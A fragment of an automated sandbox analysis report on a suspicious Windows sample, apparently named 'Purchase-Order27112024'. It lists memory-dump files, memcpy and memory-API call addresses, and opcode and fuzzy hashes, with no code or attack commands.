                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3110682361-0
                                                                                                      • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                      • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3510742995-0
                                                                                                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8